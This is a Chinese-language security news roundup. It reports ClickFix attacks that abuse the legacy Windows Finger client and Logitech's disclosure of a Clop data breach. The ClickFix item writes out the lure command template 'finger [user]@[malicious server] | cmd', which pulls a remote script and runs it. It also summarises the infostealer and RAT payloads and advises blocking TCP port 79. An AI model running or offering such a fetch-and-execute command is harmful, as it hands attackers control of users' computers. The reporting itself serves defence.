约 40 年前的 Windows 古董命令被滥用,黑客远程投毒可掌控你的 PC|罗技承认遭攻击!黑客称窃取近 1.8TB 数据

关键词

黑客

科技媒体 bleepingcomputer 昨日(11 月 15 日)发布博文,报道称近期有黑客滥用诞生约年的 “Finger” 协议,成为新型 ClickFix 恶意软件攻击的关键环节。

注:”Finger” 协议是一种非常早期的互联网协议,诞生于上世纪 70 年代,主要功能是让用户查询其他用户的公开信息(如登录名、最后上线时间等)。在现代网络环境中已基本废弃,但其客户端程序(finger.exe)仍在某些操作系统(如 Windows)中保留。

攻击者利用该协议,在新型的 ClickFix 恶意软件攻击中,向受感染的 Windows 设备远程下发并执行恶意命令。Finger 协议最初用于在 Unix / Linux 系统上查询用户信息,后来也被集成到 Windows 中。

虽然如今已鲜有人使用,但其作为系统原生工具的特性,让其成为一种理想的 ” 原生二进制程序(LOLBIN)”,能有效规避部分安全软件的检测。

攻击的核心在于社会工程学欺骗。攻击者会通过各种方式(如网页弹窗)显示一个伪造的 ” 人机验证 ” 提示,诱导用户按下 Win+R 快捷键并输入一行看似无害的命令。

自动草稿该命令格式通常为 finger [ 用户名 ] @ [ 恶意服务器地址 ] | cmd。一旦用户执行,Windows 系统内置的 finger.exe 程序便会向指定服务器发起请求,而服务器返回的并非用户信息,而是一段预设的恶意脚本。

通过管道符 |,该脚本的输出被直接传递给 Windows 命令处理器 cmd.exe 执行,从而完成恶意代码的远程投递。

自动草稿恶意脚本执行后,会立即展开一系列后续动作。它首先会创建一个随机命名的路径,并下载一个伪装成 PDF 文件的 ZIP 压缩包。解压后,其中的恶意载荷便会被激活。自动草稿根据分析,这些载荷主要分为两类:一类是专门用于窃取用户密码、浏览器记录等敏感数据的信息窃取程序(Infostealer);另一类则是功能更强大的 NetSupport Manager 远程访问木马(RAT),一旦植入,攻击者便能完全控制受害者的计算机。

为实现持久化,该脚本还会创建一个计划任务,确保恶意软件在用户每次登录系统时都能自动运行。

自动草稿研究人员发现,这种攻击手法还在不断演进。在一些更新的攻击案例中,恶意脚本在执行核心任务前,会先扫描受害者电脑中是否存在常见的恶意软件分析工具。自动草稿这些工具包括 Process Monitor、Wireshark、Fiddler、OllyDbg 等数十款。如果检测到任何一款分析工具正在运行,脚本会立即终止执行,从而增加安全研究人员对其进行分析和追踪的难度。

由于此类攻击依赖于 Finger 协议进行通信,而该协议使用专门的 TCP 79 端口,因此防御策略也相对明确。对于绝大多数企业和个人用户而言,Finger 协议并无实际用途。因此,系统管理员和安全防护人员应在网络防火墙上阻止所有出站到 TCP 79 端口的流量。

关键词

罗技

11 月 15 日消息,科技媒体 bleepingcomputer 昨日(11 月 14 日)发布博文,报道称罗技(Logitech)向美国证券交易委员会(SEC)提交 8-K 表格,正式确认公司遭遇了一起网络安全事件,导致部分数据外泄。


罗技指出,此次攻击的幕后黑手是 Clop 勒索团伙。该团伙以利用软件漏洞进行大规模数据盗窃和勒索而闻名,此前曾在 7 月份针对 Oracle E-Business Suite(甲骨文电子商务套件)的用户发起过一系列攻击。


罗技在公告中详细说明了事件的影响范围。公司表示,在发现事件后,已立即联合顶尖的外部网络安全公司展开调查与响应。初步调查显示,被盗数据可能包含有限的员工和消费者信息,以及部分客户与供应商的相关资料。


不过,罗技强调,由于被攻击的系统并未存储用户身份证号、信用卡信息等高度敏感数据,因此相信黑客未能获取此类信息。同时,公司确认此次事件未对产品、业务运营或生产制造造成任何影响。


根据罗技的声明,此次数据泄露的根本原因是一个第三方的零日漏洞,公司在获得修复补丁后已第一时间进行了修补。这一说法与 Clop 勒索团伙的行动轨迹相吻合。


事实上,在罗技发布官方声明的一周前,Clop 团伙就已将罗技列入其数据泄露勒索网站,并公开了据称从罗技窃取的高达 1.8 TB 数据,以此作为勒索筹码。


尽管罗技并未直接点名第三方软件供应商,但外界普遍认为,此次攻击与 Clop 团伙在 7 月利用的 Oracle E-Business Suite 零日漏洞(CVE-2025-61882)直接相关。Clop 团伙当时向多家使用该套件的企业发送勒索邮件,声称已窃取其敏感数据。不久后,甲骨文公司(Oracle)确认了该漏洞的存在,并紧急发布了安全更新。

文章来源 :安全圈

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容